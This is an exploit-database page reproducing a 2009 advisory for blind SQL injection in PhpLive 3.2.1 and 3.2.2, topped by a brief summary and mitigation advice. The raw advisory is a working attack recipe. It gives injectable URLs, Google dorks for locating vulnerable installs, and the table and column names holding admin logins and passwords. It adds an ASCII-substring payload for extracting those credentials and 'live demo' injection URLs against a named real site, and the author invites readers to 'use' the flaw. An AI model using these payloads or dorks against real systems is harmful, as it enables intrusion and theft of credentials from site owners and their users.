header-logo
Suggest Exploit
vendor:
PHP Live
by:
boom3rang
7,5
CVSS
HIGH
Blind SQL injection
89
CWE
Product Name: PHP Live
Affected Version From: 3.2.1
Affected Version To: 3.2.2
Patch Exists: NO
Related CWE: N/A
CPE: a:phplivesupport:phplive
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PhpLive 3.2.1/2 (x) Blind SQL injection

PhpLive is vulnerable to Blind SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by sending a malicious SQL query to the vulnerable application through the ‘l’ and ‘x’ parameters in the ‘message_box.php’ and ‘request.php’ scripts. An attacker can use this vulnerability to gain access to sensitive information such as usernames, passwords, emails, userIDs, and names stored in the ‘chat_admin’ table. The vulnerable versions are v3.2.1 and v3.2.2.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

  PhpLive 3.2.1/2 (x) Blind SQL injection                                       [_][-][X] 
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___        
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \       
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /       
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/        
                                                                           
                                                                         
      Red n'black i dress eagle on my chest. 
      It's good to be an ALBANIAN Keep my head up high for that flag i die. 
      Im proud to be an ALBANIAN
   ###################################################################    
    								          
       Author         	: boom3rang		 	                  
       Contact        	: boom3rang[at]live.com                          
       Greetz   	: H!tm@N - KHG - cHs

		  R.I.P redc00de		          
   -------------------------------------------------------------------    
    								          
                  Affected software description    	                  
       Software 	: PhpLive             	                          
       Vendor		: http://www.phplivesupport.com	                  
       Price 	      	: Live Support Download Starts at $89.95          
       Version Vuln.    : v3.2.1 & v3.2.2			          
   -------------------------------------------------------------------    
    								          
    [~] SQLi :						                  
    								          
    http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi]           
    http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi]         	          
      
                                                                   
    [~]Google Dork :		   				                  
    
    Powered by PHP Live! v3.2.1							    
    Powered by PHP Live! v3.2.2  
    allinurl:"request.php" "deptid"						          
    								          
   -------------------------------------------------------------------    
    								          
    [~] Table_NAME  =  chat_admin
    [~] Column_NAME =  login - password - email - userID - name			                  								          
   -------------------------------------------------------------------    
    								          
    [~] Admin Path :					                  
    								          
    http://www.TARGET.com/phplive	
   -------------------------------------------------------------------		                  
    [~] Live Demo:
    
    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1    --> True
    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2    --> False

   -------------------------------------------------------------------

    [~] ASCII 

  /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100

   -------------------------------------------------------------------
    
    [~] Live Demo ASCII

      True
   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48		
      
      False
   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127   			
			          
   ============================================================================
   | USE this vulnerability, to improve your skills for Social Engineering  ;)  |
   ============================================================================

# milw0rm.com [2009-07-16]

Navigation

Suggest Exploit

Services By CQR